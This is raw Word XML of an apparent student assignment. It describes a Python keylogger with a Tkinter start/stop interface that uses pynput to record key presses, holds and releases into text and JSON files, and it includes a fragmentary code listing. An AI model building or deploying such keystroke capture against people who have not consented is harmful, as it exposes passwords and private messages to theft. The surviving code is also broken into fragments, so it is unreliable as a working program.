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F5" w:rsidRDefault="00DD2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KEYLOGGER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2E14" w:rsidRDefault="00DD2E1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 xml:space="preserve">   WORKING PROCESS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2E14" w:rsidRPr="00DD2E14" w:rsidRDefault="00DD2E14" w:rsidP="00DD2E1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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2E14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Start Button</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2E14">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0D0D0D"/>
        </w:rPr>
        <w:t xml:space="preserve">: When you click the "Start" button in the GUI,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will begin capturing keyboard events. It will display a message in the GUI indicating that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is running and saving the keys in 'keylogger.txt'. The "Start" button will be disabled, and the "Stop" button will be enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2E14" w:rsidRPr="00DD2E14" w:rsidRDefault="00DD2E14" w:rsidP="00DD2E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Logging Keys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As you type on your keyboard,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record each key press, hold, and release event. It will save this information to two files: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Pr="002136BF" w:rsidRDefault="00DD2E14" w:rsidP="002136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Stop Button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When you click the "Stop" button in the GUI,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stop capturing keyboard events. It will display a message in the GUI indicating that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has stopped. The "Start" button will be enabled again, and the "Stop" button will be disabled.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9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7"/>
        <w:gridCol w:w="1782"/>
        <w:gridCol w:w="36"/>
        <w:gridCol w:w="17"/>
      </w:tblGrid>
      <w:tr w:rsidR="002136BF" w:rsidRPr="002136BF" w:rsidTr="002136BF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7446" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1068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6"/>
            </w:tblGrid>
            <w:tr w:rsidR="002136BF" w:rsidRPr="002136BF">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="002136BF" w:rsidRPr="002136BF" w:rsidRDefault="002136BF" w:rsidP="002136B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2136BF" w:rsidRP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  <w:t>CODE:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1565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2136BF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6:10 AM (1 hour ago)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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6E7F7AFF" wp14:editId="2B9E6BD8">
                  <wp:extent cx="10795" cy="1079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779C03D3" wp14:editId="374BA4FF">
                  <wp:extent cx="10795" cy="1079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6BF" w:rsidRPr="002136BF" w:rsidTr="002136BF">
        <w:trPr>
          <w:gridAfter w:val="1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1382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9"/>
            </w:tblGrid>
            <w:tr w:rsidR="002136BF" w:rsidRPr="002136BF">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:noWrap/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="002136BF" w:rsidRPr="002136BF" w:rsidRDefault="002136BF" w:rsidP="002136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2136BF" w:rsidRPr="002136BF" w:rsidRDefault="002136BF" w:rsidP="002136B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B68E0B8" wp14:editId="1181D261">
                        <wp:extent cx="10795" cy="1079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20" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr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*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pynput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keyboard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 = ""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open('key_log.txt', "w+") as keys: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key_log.json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'+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wb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')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json.dumps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).encode()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False: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{'Pressed':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{'Held':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{'Released':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keys +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(keys))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keyboard.Listener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listener.start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text="[+]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running!\n[!] Saving the keys in 'keylogger.txt'")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text="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stopped.")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root.title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Label(root, text='Click "Start" to begin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keylogging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anchor=CENTER)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text="Start",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side=LEFT)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text="Stop",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side=RIGHT)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root.geometry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"250x250")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root.mainloop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OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002136BF" w:rsidRPr="002136BF" w:rsidRDefault="002136BF" w:rsidP="002136B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      </w:t>
      </w:r>
      <w:r w:rsidRPr="002136BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0D0D0D"/>
        </w:rPr>
        <w:t xml:space="preserve">The actual output of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002136BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0D0D0D"/>
        </w:rPr>
        <w:t>keylogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002136BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0D0D0D"/>
        </w:rPr>
        <w:t xml:space="preserve"> is saved in two files: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 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2136BF" w:rsidRDefault="008D19DC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NAME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:ANANTHA</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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JOTHI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002136BF" w:rsidRPr="002136BF" w:rsidRDefault="008D19DC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REG NO:950321104006</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="002136BF" w:rsidRPr="00DD2E14" w:rsidRDefault="002136BF" w:rsidP="002136BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002136BF" w:rsidRPr="00D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9F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E0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70E1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6426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14"/>
    <w:rsid w:val="00016DDD"/>
    <w:rsid w:val="002136BF"/>
    <w:rsid w:val="008D19DC"/>
    <w:rsid w:val="00DD2E14"/>
    <w:rsid w:val="00D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40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76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E7D2F-7A7C-49AC-8B24-AD2550D9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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-02T09:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-02T09:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>